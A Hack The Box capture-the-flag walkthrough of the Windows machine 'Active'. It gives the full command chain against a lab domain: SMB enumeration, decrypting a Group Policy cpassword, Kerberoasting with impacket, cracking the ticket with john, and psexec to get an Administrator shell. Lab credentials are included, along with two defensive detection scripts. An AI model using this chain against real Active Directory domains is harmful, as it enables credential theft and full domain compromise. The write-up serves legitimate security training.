HTB Active (Easy) – Walkthrough

Hello hacker! We're going to dive into this easy Windows machine named "Active" on the Hack The Box website and try to capture the flags.

I hope the steps below are easy to follow; if you want me to add more detail on any part or anything specific, please feel free to contact me here!

Now let's move on and start with our first scan.

1. Nmap result:

53/tcp   open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-15 08:45:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)

Great! We have some interesting ports: 139 and 445 for SMB, so let's look at the enum4linux output:

$ enum4linux MACHINE_IP

//MACHINE_IP/ADMIN$        Mapping: DENIED  Listing: N/A     Writing: N/A
//MACHINE_IP/C$            Mapping: DENIED  Listing: N/A     Writing: N/A
//MACHINE_IP/IPC$          Mapping: OK      Listing: DENIED  Writing: N/A
//MACHINE_IP/NETLOGON      Mapping: DENIED  Listing: N/A     Writing: N/A
//MACHINE_IP/Replication   Mapping: OK      Listing: OK      Writing: N/A
//MACHINE_IP/SYSVOL        Mapping: DENIED  Listing: N/A     Writing: N/A
//MACHINE_IP/Users         Mapping: DENIED  Listing: N/A     Writing: N/A

We can see that the "Replication" share is the only one with "Listing: OK", so let's enumerate it with smbclient as an anonymous user.

Browsing the share, we find an interesting file:

Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/groups.xml

We download the file groups.xml and check its content:

<groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<user clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<properties action="U" newname="" fullname="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changelogon="0" nochange="1" neverexpires="1" acctdisabled="0" username="active.htb\SVC_TGS">
</properties></user>
</groups>

Before we look for useful data in this content, some background: older versions of Windows stored Group Policy Preferences (local user and group settings, including passwords) in Groups.xml, and the password sits in the cpassword attribute encrypted with an AES key that Microsoft documented publicly, so the value can be decrypted directly rather than cracked.
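An added example, not part of the original post: the check a defender runs over a SYSVOL copy to find Group Policy Preference files that still carry a cpassword attribute. The sample content is the groups.xml shown above; the function names and the list of preference file names are my own choices.

```python
import os
import xml.etree.ElementTree as ET

# Sample content copied from the groups.xml shown above (backslashes escaped for Python).
SAMPLE_GROUPS_XML = """<groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<user clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2"
 changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<properties action="U" newname="" fullname="" description=""
 cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
 changelogon="0" nochange="1" neverexpires="1" acctdisabled="0" username="active.htb\\SVC_TGS">
</properties></user></groups>"""

# Preference files that can carry a cpassword attribute (matched case-insensitively).
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "printers.xml", "drives.xml"}


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        # Attribute names differ in case between Windows versions, so normalise them.
        attrs = {k.lower(): v for k, v in elem.attrib.items()}
        if attrs.get("cpassword"):
            findings.append({
                "file": source,
                "element": elem.tag,
                "account": attrs.get("username") or attrs.get("name")
                           or attrs.get("accountname") or "?",
            })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (or any directory) and audit every GPP file found in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), source=path))
    return findings


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, source="groups.xml"):
        print(f"[!] {f['file']}: <{f['element']}> for {f['account']} still holds a cpassword")
```

Any hit means the preference item must be deleted and the account's password rotated; removing the XML alone is not enough, because the value has been readable by every domain user since it was written.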

So we have two pieces of information that will help us in the exploitation phase:

  1. name="active.htb\SVC_TGS"
  2. cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

2. Exploitation and user flag

Now let's decrypt the cpassword with the gpp-decrypt command:

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Decrypted! Now let's check which shares SVC_TGS can access with smbmap:

$ smbmap -H MACHINE_IP -u SVC_TGS -p GPPstillStandingStrong2k18

ADMIN$                                 NO ACCESS       Remote Admin
C$                                     NO ACCESS       Default share
IPC$                                   NO ACCESS       Remote IPC
NETLOGON                               READ ONLY       Logon server share
Replication                            READ ONLY
SYSVOL                                 READ ONLY       Logon server share
Users                                  READ ONLY

Awesome! The Users share is now READ ONLY for us, so we can fetch user.txt from SVC_TGS's Desktop folder with smbclient:

$ smbclient //MACHINE_IP/Users -U active.htb/svc_tgs

3. PrivEsc and Root flag

Useful link: https://www.browserling.com/tools/ntlm-hash (online NTLM hash generator)

The username SVC_TGS suggests a service account tied to the "Ticket Granting Service", which points us towards Kerberos.

"Kerberoasting" is an attack on the Kerberos authentication protocol: any authenticated domain user can request a service ticket (TGS) for an account that has an SPN, and because that ticket is encrypted with the service account's password hash, it can be taken offline and cracked to recover the account's plaintext password.
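An added example from the defender's side, not part of the original post: the TGS hash obtained below starts with $krb5tgs$23$, i.e. RC4-HMAC (encryption type 0x17), and that is what a Kerberoasting detection on Windows Security event 4769 keys on. The events, IP addresses and the second SPN "svc_sql" are constructed sample data; the function names are my own.

```python
from collections import defaultdict

# Constructed sample 4769 events (not real logs): only the fields the rule needs.
# TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256; Status 0x0 is success.
EVENTS = [
    {"time": "2024-05-15T04:44:30Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-15T04:44:31Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",    # constructed second SPN
     "Status": "0x0", "IpAddress": "10.0.0.5"},
    {"time": "2024-05-15T04:45:02Z", "TargetUserName": "DC$@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",        # machine account, AES: normal
     "Status": "0x0", "IpAddress": "10.0.0.100"},
    {"time": "2024-05-15T04:45:09Z", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",     # TGT traffic, not a roastable SPN
     "Status": "0x0", "IpAddress": "10.0.0.55"},
]


def is_roast_candidate(ev):
    """One 4769 looks roast-like when the ticket is RC4, the request succeeded,
    and the service is a user account (not a machine account and not krbtgt)."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == "0x17"
            and ev["Status"] == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect(events, min_spns=1):
    """Report each requesting account that obtained RC4 tickets for at least
    min_spns distinct user-account SPNs, with source IPs and the time span."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(ev)
    alerts = []
    for user, evs in sorted(by_user.items()):
        spns = sorted({e["ServiceName"] for e in evs})
        if len(spns) >= min_spns:
            alerts.append({"user": user, "spns": spns,
                           "sources": sorted({e["IpAddress"] for e in evs}),
                           "first": min(e["time"] for e in evs),
                           "last": max(e["time"] for e in evs)})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[!] {a['user']} from {a['sources']} requested RC4 tickets for "
              f"{a['spns']} between {a['first']} and {a['last']}")
```

On Active only the Administrator SPN exists, so min_spns=1 is what catches it; in a larger domain raise the threshold, and once AES-only is enforced on service accounts any RC4 request for them is worth an alert on its own.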

Let's try it!

$ impacket-GetUserSPNs -dc-ip MACHINE_IP -request active.htb/SVC_TGS

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2024-05-15 04:44:30.583765             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$af75fc7fedc34d95bbf4c78e1fb830ef$...

It works! Now we crack the hash with john using the krb5tgs format: copy the hash into a file named hash and run john as below:

$ john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt

Ticketmaster1968 (?)    

We use this password with psexec to get a shell as Administrator and read the root flag:

$ impacket-psexec administrator@MACHINE_IP

Finally, we managed to complete this easy Windows machine. I hope everything was clear and that you enjoyed the hacking; don't forget to share this walkthrough with your friends!

If you have any suggestions or want me to add more detail to this post, feel free to contact me here.